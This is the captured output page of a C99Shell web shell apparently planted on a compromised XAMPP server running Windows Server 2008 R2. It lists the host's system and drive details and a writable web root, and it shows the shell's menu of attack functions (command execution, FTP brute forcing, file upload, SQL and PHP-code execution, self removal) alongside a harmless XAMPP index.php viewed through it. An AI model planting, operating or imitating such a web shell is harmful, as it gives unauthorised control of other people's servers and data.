!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\xampp\   drwxrwxrwx
Free 7.29 GB of 239.26 GB (3.05%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (1.42 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
if (@file_get_contents("../../install/xampp_language.txt") == "") {
        if (!empty(
$_SERVER['HTTPS']) && ('on' == $_SERVER['HTTPS'])) {
            
$uri 'https://';
        } else {
            
$uri 'http://';
        }
        
$uri .= $_SERVER['HTTP_HOST'];
        
header('Location: '.$uri.'/xampp/splash.php');
        exit;
    }

    include 
'langsettings.php';
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
        "http://www.w3.org/TR/html4/frameset.dtd">
<html>
    <head>
        <meta name="author" content="Kai Oswald Seidler">
        <meta http-equiv="cache-control" content="no-cache">
        <link href="xampp.css" rel="stylesheet" type="text/css">
        <link href="img/xampp.ico" rel="shortcut icon" type="image/x-icon">
        <title>
            <?php echo trim(@file_get_contents('../../install/xampp_modell.txt')); ?>
            <?php echo trim(@file_get_contents('../../install/xampp_version.txt')); ?>
        </title>
    </head>
    
    <frameset rows="74,*" frameborder="0" framespacing="0" border="0">
        <frame name="head" src="head.php" scrolling="no" marginwidth="0" marginheight="0">
        <frameset cols="150,*" frameborder="0" framespacing="0" border="0">
            <frame name="navi" src="navi.php" scrolling="no" marginwidth="0" marginheight="0">
            <frame name="content" src="start.php" marginwidth="20" marginheight="0">
        </frameset>
    </frameset>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--